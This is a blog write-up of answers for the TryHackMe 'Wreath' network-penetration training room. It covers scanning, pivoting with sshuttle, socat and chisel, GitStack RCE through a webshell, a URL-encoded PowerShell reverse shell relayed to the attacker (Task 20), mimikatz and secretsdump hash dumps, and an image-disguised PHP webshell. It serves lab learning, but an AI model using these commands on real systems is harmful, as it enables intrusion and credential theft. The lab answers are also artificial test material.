Wreath - [THM]

Cover Image for Wreath - [THM]
Marmeus
Marmeus

Table of Contents

    Introduction

    In this post I have stored every single flag you need in order to complete the network room Wreath.

    If you want further detail about how to solve each task I encourage you to watch the DarkSec`s playlist.

    Wreath infraestructure

    Task 5 - [Webserver] Enumeration

    How many of the first 15000 ports are open on the target?

    kali@kali:~/Documents/THM/Wreath$ sudo nmap -sS -n -T5 -oN first.txt 10.200.86.200                                                                                 
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-10 18:24 EDT                                                                                                    
    Nmap scan report for 10.200.86.200                                                                                                                                 
    Host is up (0.049s latency).
    Not shown: 995 filtered ports
    PORT      STATE  SERVICE
    22/tcp    open   ssh
    80/tcp    open   http
    443/tcp   open   https
    9090/tcp  closed zeus-admin
    10000/tcp open   snet-sensor-mgmt
    

    There are 4 ports.

    What OS does Nmap think is running?

    kali@kali:~/Documents/THM/Wreath$ sudo nmap -sC -sV -p22,80,443,10000,9090 -T5 -n -oN firstDepth.txt 10.200.86.200
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-10 18:25 EDT
    Stats: 0:00:15 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
    NSE Timing: About 99.63% done; ETC: 18:26 (0:00:00 remaining)
    Nmap scan report for 10.200.86.200
    Host is up (0.048s latency).
    
    PORT      STATE  SERVICE    VERSION
    22/tcp    open   ssh        OpenSSH 8.0 (protocol 2.0)
    | ssh-hostkey: 
    |   3072 9c:1b:d4:b4:05:4d:88:99:ce:09:1f:c1:15:6a:d4:7e (RSA)
    |   256 93:55:b4:d9:8b:70:ae:8e:95:0d:c2:b6:d2:03:89:a4 (ECDSA)
    |_  256 f0:61:5a:55:34:9b:b7:b8:3a:46:ca:7d:9f:dc:fa:12 (ED25519)
    80/tcp    open   http       Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1c)
    |_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1c
    |_http-title: Did not follow redirect to https://thomaswreath.thm
    443/tcp   open   ssl/http   Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1c)
    | http-methods: 
    |_  Potentially risky methods: TRACE
    |_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1c
    |_http-title: Thomas Wreath | Developer
    | ssl-cert: Subject: commonName=thomaswreath.thm/organizationName=Thomas Wreath Development/stateOrProvinceName=East Riding Yorkshire/countryName=GB
    | Not valid before: 2021-04-10T16:32:29
    |_Not valid after:  2022-04-10T16:32:29
    |_ssl-date: TLS randomness does not represent time
    | tls-alpn: 
    |_  http/1.1
    9090/tcp  closed zeus-admin
    10000/tcp open   http       MiniServ 1.890 (Webmin httpd)
    |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 44.38 seconds
    

    As we can see in the nmap scan of the port 80 and 443 is Centos.

    Open the IP in your browser -- what site does the server try to redirect you to?

    https://thomaswreath.thm/

    Note: We need to add this host to the /etc/hosts file.

    Read through the text on the page. What is Thomas' mobile phone number? +447821548812

    Look back at your service scan results: what server version does Nmap detect as running here? MiniServ 1.890 (Webmin httpd)

    What is the CVE number for this exploit? Looking in google "MiniServ 1.890 CVE" appears the CVE "CVE-2019-15107"

    Task 6 - [Webserver] Explotation

    Which user was the server running as? root

    What is the root user's password hash?

    The root hash is in /etc/shadow.

    $6$i9vT8tk3SoXXxK2P$HDIAwho9FOdd4QCecIJKwAwwh8Hwl.BdsbMOUAd3X/chSCvrmpfy.5lrLgnRVNq6/6g0PxK9VqSdy47/qKXad1

    What is the full path to this file? /root/.ssh/id_rsa

    Task 8 - [Pivoting] High-level Overview

    Which type of pivoting creates a channel through which information can be sent hidden inside another protocol?

    Tunnelling: Creating a proxy type connection through a compromised machine in order to route all desired traffic into the targeted network. This could potentially also be tunnelled inside another protocol (e.g. SSH tunnelling)

    Which Metasploit Framework Meterpreter command can be used to create a port forward? portfwd

    Task 9 - [Pivoting] Enumeration

    What is the absolute path to the file containing DNS entries on Linux?

    /etc/resolv.conf

    What is the absolute path to the hosts file on Windows?

    C:\Windows\System32\drivers\etc\hosts

    How could you see which IP addresses are active and allow ICMP echo requests on the 172.16.0.x/24 network using Bash?

    for i in {1..255}; do (ping -c 1 172.16.0.${i} | grep "bytes from" &); done

    Task 10 - [Pivoting] Proxychains & Foxyproxy

    What line would you put in your proxychains config file to redirect through a socks4 proxy on 127.0.0.1:4242?

    socks4 127.0.0.1:4242

    What command would you use to telnet through a proxy to 172.16.0.100:23?

    proxychain telnet 172.16.0.100:23

    Which tool is more apt for proxying to a webapp: Proxychains (PC) or FoxyProxy (FP)?

    "FP". FoxyProxy is very usefull in combination with burp.

    Task 11 - [Pivoting] SSH Tunnelling / Port Forwarding

    If you're connecting to an SSH server from your attacking machine to create a port forward, would this be a local (L) port forward or a remote (R) port forward?

    Local. Because the listening port will be in our machine.

    Which switch combination can be used to background an SSH port forward or tunnel?

    -fN. The switchs -f backgrounds the shell immediately so that we have our own terminal back. The switch-N tells SSH that it doesn't need to execute any commands (only set up the connection).

    It's a good idea to enter our own password on the remote machine to set up a reverse proxy, Aye or Nay? Nay. You are taking the risk of getting hacked.

    What command would you use to create a pair of throwaway SSH keys for a reverse connection?

    ssh-keygen

    If you wanted to set up a reverse portforward from port 22 of a remote machine (172.16.0.100) to port 2222 of your local machine (172.16.0.200), using a keyfile called id_rsa and backgrounding the shell, what command would you use? (Assume your username is "kali")

    ssh -R 2222:172.16.0.200:22 kali@172.16.0.100 -i id_rsa -fN

    What command would you use to set up a forward proxy on port 8000 to user@target.thm, backgrounding the shell?

    ssh -D 8000 user@target.thm

    If you had SSH access to a server (172.16.0.50) with a webserver running internally on port 80 (i.e. only accessible to the server itself on 127.0.0.1:80), how would you forward it to port 8000 on your attacking machine? Assume the username is "user", and background the shell.

    ssh -L 8000:127.0.0.1:80 user@172.16.0.50

    Task 12 - [Pivoting] plink.exe

    What tool can be used to convert OpenSSH keys into PuTTY style keys?

    puttygen

    Task 13 - [Pivoting] Socat

    Which socat option allows you to reuse the same listening port for more than one connection?

    reuseaddr

    If your Attacking IP is 172.16.0.200, how would you relay a reverse shell to TCP port 443 on your Attacking Machine using a static copy of socat in the current directory? Use TCP port 8000 for the server listener, and do not background the process.

    ./socat tcp-l:8000 tcp:172.16.0.200:443

    What command would you use to forward TCP port 2222 on a compromised server, to 172.16.0.100:22, using a static copy of socat in the current directory, and backgrounding the process (easy method)?

    Task 14 - [Pivoting] Chisel

    Use port 4242 for the listener and do not background the process.

    ./chisel server -p 4242 --reverse

    What command would you use to connect back to this server with a SOCKS proxy from a compromised host, assuming your own IP is 172.16.0.200 and backgrounding the process?

    ./chisel client 172.16.0.200:4242 r:socks

    How would you forward 172.16.0.100:3306 to your own port 33060 using a chisel remote port forward, assuming your own IP is 172.16.0.200 and the listening port is 1337? Background this process.

    ./chisel client 172.16.0.100:3306 R:33060:172.16.0.200 &

    If you have a chisel server running on port 4444 of 172.16.0.5, how could you create a local portforward, opening port 8000 locally and linking to 172.16.0.10:80?

    ./chisel client 172.16.0.5:4444 8000:172.16.0.10:80

    Task 15 - [Pivoting] Sshuttle

    How would you use sshuttle to connect to 172.16.20.7, with a username of "pwned" and a subnet of 172.16.0.0/16

    sshuttle -r pwned@172.16.20.7 172.16.0.0/24 &

    What switch (and argument) would you use to tell sshuttle to use a keyfile called "priv_key" located in the current directory?

    --ssh-cmd "ssh -i priv_key"

    You are trying to use sshuttle to connect to 172.16.0.100. You want to forward the 172.16.0.x/24 range of IP addreses, but you are getting a Broken Pipe error. What switch (and argument) could you use to fix this error?

    -x 172.16.0.100

    Task 17 - Git Server Enumeration

    Excluding the out of scope hosts, and the current host (.200), how many hosts were discovered active on the network?

    [root@prod-serv tmp]# sudo ./nmap-Marmeus -sn 10.200.86.200/24 -oN Network.txt
    
    Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2021-04-11 23:12 BST
    Cannot find nmap-payloads. UDP payloads are disabled.
    Nmap scan report for ip-10-200-86-1.eu-west-1.compute.internal (10.200.86.1)
    Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
    Host is up (-0.18s latency).
    MAC Address: 02:1B:CD:06:03:85 (Unknown)
    Nmap scan report for ip-10-200-86-100.eu-west-1.compute.internal (10.200.86.100)
    Host is up (0.00017s latency).
    MAC Address: 02:AD:75:A4:4E:FB (Unknown)
    Nmap scan report for ip-10-200-86-150.eu-west-1.compute.internal (10.200.86.150)
    Host is up (0.00045s latency).
    MAC Address: 02:36:9B:04:64:51 (Unknown)
    Nmap scan report for ip-10-200-86-250.eu-west-1.compute.internal (10.200.86.250)
    Host is up (0.00048s latency).
    MAC Address: 02:41:59:75:01:D5 (Unknown)
    Nmap scan report for ip-10-200-86-200.eu-west-1.compute.internal (10.200.86.200)
    Host is up.
    Nmap done: 256 IP addresses (5 hosts up) scanned in 4.83 seconds
    

    Exluding the server (.200) and the OepnVPN server (.250), there are 2 machines.

    In ascending order, what are the last octets of these host IPv4 addresses? (e.g. if the address was 172.16.0.80, submit the 80)

    100,150

    Scan the hosts -- which one does not return a status of "filtered" for every port (submit the last octet only)?

    [root@prod-serv tmp]# sudo ./nmap-Marmeus -sS 10.200.86.150 -T5 -oN 150.txt
    
    Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2021-04-11 23:17 BST
    Unable to find nmap-services!  Resorting to /etc/services
    Cannot find nmap-payloads. UDP payloads are disabled.
    Warning: 10.200.86.150 giving up on port because retransmission cap hit (2).
    Nmap scan report for ip-10-200-86-150.eu-west-1.compute.internal (10.200.86.150)
    Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
    Host is up (-0.023s latency).
    Not shown: 6147 filtered ports
    PORT     STATE SERVICE
    80/tcp   open  http
    3389/tcp open  ms-wbt-server
    5985/tcp open  wsman
    MAC Address: 02:36:9B:04:64:51 (Unknown)
    
    Nmap done: 1 IP address (1 host up) scanned in 17.48 seconds
    

    The IP that does return somtheing is "150".

    Let's assume that the other host is inaccessible from our current position in the network. Which TCP ports (in ascending order, comma separated) below port 15000, are open on the remaining target?

    80,3389,5985

    We cannot currently perform a service detection scan on the target without first setting up a proxy, so for the time being, let's assume that the services Nmap has identified based on their port number are accurate. (Please feel free to experiment with other scan types through a proxy after completing the pivoting section). Assuming that the service guesses made by Nmap are accurate, which of the found services is more likely to contain an exploitable vulnerability?

    HTTP. Nowadays, most of the vulnerabilities discovered are from web services.

    Task 18 - [Git Server] Pivoting

    What is the name of the program running the service?

    First we need to use sshuttle in order to get access to the internal network.

    sshuttle -r root@10.200.86.200 --ssh-cmd "ssh -i FirstRoot.key" 10.200.86.200/24 -x 10.200.86.200

    Then, using the web browser trying to access to the web server, we obtain an error, showing which folders are available.

    The program is gistack.

    Do these default credentials work (Aye/Nay)?

    Trying to access to /registration/login/ shows a login form with defaults creds, which Nay work.

    You will see that there are three publicly available exploits. There is one Python RCE exploit for version 2.3.10 of the service. What is the EDB ID number of this exploit?

    kali@kali:~/Documents/THM/Wreath$ searchsploit gitstack  2.3.10
    -----------------------------------------------------------------------
     Exploit Title                                  |  Path
    -----------------------------------------------------------------------
    GitStack 2.3.10 - Remote Code Execution         | php/webapps/43777.py
    -----------------------------------------------------------------------
    Shellcodes: No Results
    

    The exploit id is 43777.

    Task 19 - [Git server] Code Review

    Look at the information at the top of the script. On what date was this exploit written?

    kali@kali:~/Documents/THM/Wreath$ cat GitStackExploit.py
    # Exploit: GitStack 2.3.10 Unauthenticated Remote Code Execution
    # Date: 18.01.2018 
    

    Is the script written in Python2 or Python3?

    As we can see in the exploit, prints are used like this:

    print "[+] Get user list"

    Hence, it has been writeen in Python2

    Just to confirm that you have been paying attention to the script: What is the name of the cookie set in the POST request made on line 74 (line 73 if you didn't add the shebang) of the exploit?

    r = requests.post("http://{}/rest/repository/".format(ip), cookies={'csrftoken' : csrf_token}, data={'name' : repository, 'csrfmiddlewaretoken' : csrf_toke n})

    The cookie name is "csrftoken".

    Task 20 - [Git server] Exploitation

    First up, let's use some basic enumeration to get to grips with the webshell: What is the hostname for this target?

    kali@kali:~/Documents/THM/Wreath$ curl -X POST http://10.200.86.150/web/exploit.php -d "a=hostname"                                                              
    "git-serv"
    

    What operating system is this target?

    kali@kali:~/Documents/THM/Wreath$ curl -X POST http://10.200.86.150/web/exploit.php -d "a=systeminfo"
    "
    Host Name:                 GIT-SERV
    OS Name:                   Microsoft Windows Server 2019 Standard
    OS Version:                10.0.17763 N/A Build 17763
    OS Manufacturer:           Microsoft Corporation
    OS Configuration:          Standalone Server
    OS Build Type:             Multiprocessor Free
    Registered Owner:          Windows User
    Registered Organization:   
    Product ID:                00429-70000-00000-AA368
    Original Install Date:     08/11/2020, 13:19:49
    System Boot Time:          12/04/2021, 07:33:23
    System Manufacturer:       Xen
    System Model:              HVM domU
    System Type:               x64-based PC
    Processor(s):              1 Processor(s) Installed.
                               [01]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2400 Mhz
    BIOS Version:              Xen 4.2.amazon, 24/08/2006
    Windows Directory:         C:\Windows
    System Directory:          C:\Windows\system32
    Boot Device:               \Device\HarddiskVolume1
    System Locale:             en-gb;English (United Kingdom)
    Input Locale:              en-gb;English (United Kingdom)
    Time Zone:                 (UTC+00:00) Dublin, Edinburgh, Lisbon, London
    Total Physical Memory:     2,048 MB
    Available Physical Memory: 1,352 MB
    Virtual Memory: Max Size:  2,432 MB
    Virtual Memory: Available: 1,841 MB
    Virtual Memory: In Use:    591 MB
    Page File Location(s):     C:\pagefile.sys
    Domain:                    WORKGROUP
    Logon Server:              N/A
    Hotfix(s):                 5 Hotfix(s) Installed.
                               [01]: KB4580422
                               [02]: KB4512577
                               [03]: KB4580325
                               [04]: KB4587735
                               [05]: KB4592440
    Network Card(s):           1 NIC(s) Installed.
                               [01]: AWS PV Network Device
                                     Connection Name: Ethernet
                                     DHCP Enabled:    Yes
                                     DHCP Server:     10.200.86.1
                                     IP address(es)
                                     [01]: 10.200.86.150
                                     [02]: fe80::adcb:215a:130f:782c
    Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.
    " 
    

    The operative system is Windows.

    What user is the server running as?

    kali@kali:~/Documents/THM/Wreath$ curl -X POST http://10.200.86.150/web/exploit.php -d "a=whoami"
    "nt authority\system" 
    

    The user is "nt authority\system".

    This will send three ICMP ping packets back to you. How many make it to the waiting listener?

    kali@kali:~/Documents/THM/Wreath$ curl -X POST http://10.200.86.150/web/exploit.php -d "a=ping -n 3 10.50.87.60"
    "
    Pinging 10.50.87.60 with 32 bytes of data:
    Request timed out.
    Request timed out.
    Request timed out.
    
    Ping statistics for 10.50.87.60:
        Packets: Sent = 3, Received = 0, Lost = 3 (100% loss),
    " 
    

    0 packets.

    Pick a method (cURL, BurpSuite, or any others) and get a shell!

    1. Create a firewall rule in order to open a port.
    [root@prod-serv tmp]firewall-cmd --zone=public --add-port 44444/tcp
    success
    
    1. Upload socat to the CentOs machine.

    kali@kali:$ scp -i FirstRoot.key ./socat root@10.200.86.200:/tmp/socat-Marmeus

    1. Execute socat.

    [root@prod-serv tmp]# ./socat-Marmeus tcp-l:44444 tcp:10.50.87.60:4444

    1. Put a listener port in the attacking machine.

    nc -nlvp 4444

    1. Create a reverse shell with powershell through the socat port.
    kali@kali:~/Documents/THM/Wreath$ curl -X POST http://10.200.86.150/web/exploit.php -d "a=powershell.exe%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient(%2710.200.86.200%27%2C44444)%3B%24stream%20%3D%20%24client.GetStream()%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile((%24i%20%3D%20%24stream.Read(%24bytes%2C%200%2C%20%24bytes.Length))%20-ne%200)%7B%3B%24data%20%3D%20(New-Object%20-TypeName%20System.Text.ASCIIEncoding).GetString(%24bytes%2C0%2C%20%24i)%3B%24sendback%20%3D%20(iex%20%24data%202%3E%261%20%7C%20Out-String%20)%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20(pwd).Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20(%5Btext.encoding%5D%3A%3AASCII).GetBytes(%24sendback2)%3B%24stream.Write(%24sendbyte%2C0%2C%24sendbyte.Length)%3B%24stream.Flush()%7D%3B%24client.Close()%22"

    Task 21 - [Git Server] Stabilisation & Post Exploitation

    What is the Administrator password hash?

    mimikatz # lsadump::sam
    Domain : GIT-SERV
    SysKey : 0841f6354f4b96d21b99345d07b66571
    Local SID : S-1-5-21-3335744492-1614955177-2693036043
    
    SAMKey : f4a3c96f8149df966517ec3554632cf4
    
    RID  : 000001f4 (500)
    User : Administrator
      Hash NTLM: 37db630168e5f82aafa8461e05c6bbd1
    

    The Administrator hash is 37db630168e5f82aafa8461e05c6bbd1

    What is the NTLM password hash for the user "Thomas"?

    RID  : 000003e9 (1001)
    User : Thomas
      Hash NTLM: 02d90eda8f6b6b06c32d5f207831101f
    

    The NTLM hash for Thoma is 02d90eda8f6b6b06c32d5f207831101f

    What is Thomas' password?

    Using CrackStation, the password por thomas is i<3ruby.

    Task 24 - [Command and Control] Empire: Overview

    Can we get an agent back from the git server directly (Aye/Nay)?

    Nay. Because it owns another network, so we need to pivote.

    Task 27 - [Command and Control] Empire: Agents

    Using the help command for guidance: in Empire CLI, how would we run the whoami command inside an agent?

    shell whoami

    Task 32 - [Personal PC] Enumeration

    Scan the top 50 ports of the last IP address you found in Task 17. Which ports are open (lowest to highest, separated by commas)?

    Using the IP of the last machine as target, the result is the following.

    *Evil-WinRM* PS C:\Users\Administrator\Documents> Invoke-Portscan -Hosts 10.200.86.100 -TopPorts 50
    
    
    Hostname      : 10.200.86.100
    alive         : True
    openPorts     : {80, 3389}
    closedPorts   : {}
    filteredPorts : {445, 79, 88, 2049...}
    finishTime    : 4/12/2021 1:48:00 PM
    

    The answer is "80,3389".

    Task 33 - Personal PC Pivoting

    Access the website in your web browser (using FoxyProxy if you used the recommended forward proxy, or directly if you used a port forward). Using the Wappalyzer browser extension (Firefox | Chrome) or an alternative method, identify the server-side Programming language (including the version number) used on the website.

    1. Upload and execute chisel server
    *Evil-WinRM* PS C:\Users\Administrator\Documents> netsh advfirewall firewall add rule name="Chisel-Marmeus" dir=in action=allow protocol=tcp localport=44444 
    Ok.
    
    *Evil-WinRM* PS C:\Users\Administrator\Documents> upload tools/Pivoting/Windows/chisel_1.7.3_windows_amd64 C:\Windows\temp\chisel.exe
    Info: Uploading tools/Pivoting/Windows/chisel_1.7.3_windows_amd64 to C:\Windows\temp\chisel.exe
    
                                                                 
    Data: 11758248 bytes of 11758248 bytes copied
    
    Info: Upload successful!
    
    *Evil-WinRM* PS C:\Users\Administrator\Documents> cd C:\Windows\temp
    *Evil-WinRM* PS C:\Windows\temp> .\chisel.exe server -p 44444 --socks5
    chisel.exe : 2021/04/12 14:05:02 server: Fingerprint tbkknW/xKYAT1z7WopX1/1pDK7koRWEKseg0zM65xZk=
        + CategoryInfo          : NotSpecified: (2021/04/12 14:0...WEKseg0zM65xZk=:String) [], RemoteException
        + FullyQualifiedErrorId : NativeCommandError
    2021/04/12 14:05:02 server: Listening on http://0.0.0.0:44444
    
    
    1. Executing chisel client
    kali@kali:~/Documents/THM/Wreath/tools/Pivoting/Windows$ chisel client 10.200.86.150:44444 44444:socks
    2021/04/12 09:08:00 client: Connecting to ws://10.200.86.100:44444
    2021/04/12 09:08:00 client: tun: proxy#127.0.0.1:4444=>socks: Listening
    
    
    1. Configure FoxyProxy
    1. Access to the WebPage

    The Programming language and version is "PHP 7.4.11".

    Task 34 - [Personal PC] The Wonders of Git

    Use your WinRM access to look around the Git Server. What is the absolute path to the Website.git directory?

    C:\GitStack\repositories\Website.git

    Task 35 - [Personal PC] Website Code Analysis

    What does Thomas have to phone Mrs Walker about?

    kali@kali:/Website/2-345ac8b236064b431fa43f53d91c98c4834ef8f3$ vim ./resources/index.php
    [...]
        <!-- ToDo:
              - Finish the styling: it looks awful
              - Get Ruby more food. Greedy animal is going through it too fast
              - Upgrade the filter on this page. Can't rely on basic auth for everything
              - Phone Mrs Walker about the neighbourhood watch meetings
        -->
    [...]
    

    The answer is "neighbourhood watch meetings".

    Aside from the filter, what protection method is likely to be in place to prevent people from accessing this page?

    From the output of the previous questiong, the answer is "basic auth".

    Which extensions are accepted (comma separated, no spaces or quotes)?

    kali@kali:/Website/2-345ac8b236064b431fa43f53d91c98c4834ef8f3$ vim ./resources/index.php
    <?php
    
        if(isset($_POST["upload"]) && is_uploaded_file($_FILES["file"]["tmp_name"])){
            $target = "uploads/".basename($_FILES["file"]["name"]);
            $goodExts = ["jpg", "jpeg", "png", "gif"];
            if(file_exists($target)){
                header("location: ./?msg=Exists");
                die();
    [...]
    

    The accepted extensions are "jpg, jpeg,png,gif".

    Task 37 - [AV Evasion] Introduction

    Which category of evasion covers uploading a file to the storage on the target before executing it?

    On-Disk evasion

    What does AMSI stand for?

    Anti-Malware Scan Interface

    Which category of evasion does AMSI affect

    In-Memory evasion

    Task 38 - [AV Evasion] AV Detection Methods

    What other name can be used for Dynamic/Heuristic detection methods?

    Behavioural

    If AV software splits a program into small chunks and hashes them, checking the results against a database, is this a static or dynamic analysis method?

    Static

    When dynamically analysing a suspicious file using a line-by-line analysis of the program, what would antivirus software check against to see if the behaviour is malicious?

    Pre-defined rules

    What could be added to a file to ensure that only a user can open it (preventing AV from executing the payload)?

    Password

    Task 39 - [AV Evasion] PHP Payload Obfuscation

    What is the Host Name of the target?

    Once uploaded the new image, then we access the following url, obtaining the operative system information.

    http://10.200.86.100/resources/uploads/v2.jpg.php?wreath=systeminfo

    Host Name:                 WREATH-PC
    OS Name:                   Microsoft Windows Server 2019 Standard
    OS Version:                10.0.17763 N/A Build 17763
    OS Manufacturer:           Microsoft Corporation
    OS Configuration:          Standalone Server
    OS Build Type:             Multiprocessor Free
    Registered Owner:          Windows User
    Registered Organization:   
    Product ID:                00429-70000-00000-AA411
    Original Install Date:     08/11/2020, 14:55:50
    System Boot Time:          12/04/2021, 14:51:58
    System Manufacturer:       Xen
    System Model:              HVM domU
    System Type:               x64-based PC
    Processor(s):              1 Processor(s) Installed.
                               [01]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2394 Mhz
    BIOS Version:              Xen 4.2.amazon, 24/08/2006
    Windows Directory:         C:\Windows
    System Directory:          C:\Windows\system32
    Boot Device:               \Device\HarddiskVolume1
    System Locale:             en-gb;English (United Kingdom)
    Input Locale:              en-gb;English (United Kingdom)
    Time Zone:                 (UTC+00:00) Dublin, Edinburgh, Lisbon, London
    Total Physical Memory:     2,048 MB
    Available Physical Memory: 1,369 MB
    Virtual Memory: Max Size:  2,432 MB
    Virtual Memory: Available: 1,815 MB
    Virtual Memory: In Use:    617 MB
    Page File Location(s):     C:\pagefile.sys
    Domain:                    WORKGROUP
    Logon Server:              N/A
    Hotfix(s):                 5 Hotfix(s) Installed.
                               [01]: KB4580422
                               [02]: KB4512577
                               [03]: KB4580325
                               [04]: KB4587735
                               [05]: KB4592440
    Network Card(s):           1 NIC(s) Installed.
                               [01]: AWS PV Network Device
                                     Connection Name: Ethernet
                                     DHCP Enabled:    Yes
                                     DHCP Server:     10.200.86.1
                                     IP address(es)
                                     [01]: 10.200.86.100
                                     [02]: fe80::b1e7:ce3b:c3c4:a547
    Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.
    

    The Host Name is "WREATH-PC".

    What is our current username (include the domain in this)?

    With the following url we can retrieve the username.

    http://10.200.86.100/resources/uploads/v2.jpg.php?wreath=whoami

    wreath-pc\thomas

    Task 40 - [AV Evasion Compiling] Netcat & Reverse Shell!

    What output do you get when running the command: certutil.exe?

    We can retrieve the output by executing the certutil.exe in our php RCE at http://10.200.86.100/resources/uploads/v2.jpg.php?wreath=certutil.exe CertUtil: -dump command completed successfully.

    Task 41 - [AV Evasion] Enumeration

    [Research] One of the privileges on this list is very famous for being used in the PrintSpoofer and Potato series of privilege escalation exploits -- which privilege is this?

    PS C:\xampp\htdocs\resources\uploads> whoami /priv
    whoami /priv
    
    PRIVILEGES INFORMATION
    ----------------------
    
    Privilege Name                Description                               State   
    ============================= ========================================= ========
    SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
    SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
    SeCreateGlobalPrivilege       Create global objects                     Enabled 
    SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
    

    Between all of the privileges the one used in Hot Potato is "SeImpersonatePrivilege".

    There should be a bunch of results returned here. Read through them, paying particular attention to the PathName column. Notice that one of the paths does not have quotation marks around it. What is the Name (second column from the left) of this service?

    PS C:\xampp\htdocs\resources\uploads> wmic service get name,displayname,pathname,startmode | findstr /v /i "C:\Windows"
    [...]
    System Explorer Service   SystemExplorerHelpService C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe  Auto 
    [...]
    

    The Name is "SystemExplorerHelpService".

    Is the service running as the local system account (Aye/Nay)?

    C:\xampp\htdocs\resources\uploads>sc qc SystemExplorerHelpService
    sc qc SystemExplorerHelpService
    [SC] QueryServiceConfig SUCCESS
    
    SERVICE_NAME: SystemExplorerHelpService
            TYPE               : 20  WIN32_SHARE_PROCESS 
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 0   IGNORE
            BINARY_PATH_NAME   : C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe
            LOAD_ORDER_GROUP   : 
            TAG                : 0
            DISPLAY_NAME       : System Explorer Service
            DEPENDENCIES       : 
            SERVICE_START_NAME : LocalSystem
    

    Looking at "SERVICE_START_NAME" we can see that is being run as LocalSystem. Aye

    Task 43 - [Exfiltration] Exfiltration Techniques & Post Exploitation

    Is FTP a good protocol to use when exfiltrating data in a modern network (Aye/Nay)?

    Nay. Because data is not encripted IDS could detected.

    For what reason is HTTPS preferred over HTTP during exfiltration?

    Encryption.

    What is the Administrator NT hash for this target?

    kali@kali:/media/sf_2_MisPostsBlog/THM/Wreath$ secretsdump.py -sam sam.bak -system system.bak LOCAL
    Impacket v0.9.23.dev1+20210315.121412.a16198c3 - Copyright 2020 SecureAuth Corporation
    
    [*] Target system bootKey: 0xfce6f31c003e4157e8cb1bc59f4720e6
    [*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:a05c3c807ceeb48c47252568da284cd2:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:06e57bdd6824566d79f127fa0de844e2:::
    Thomas:1000:aad3b435b51404eeaad3b435b51404ee:02d90eda8f6b6b06c32d5f207831101f:::
    [*] Cleaning up... 
    

    The NT hash is "a05c3c807ceeb48c47252568da284cd2".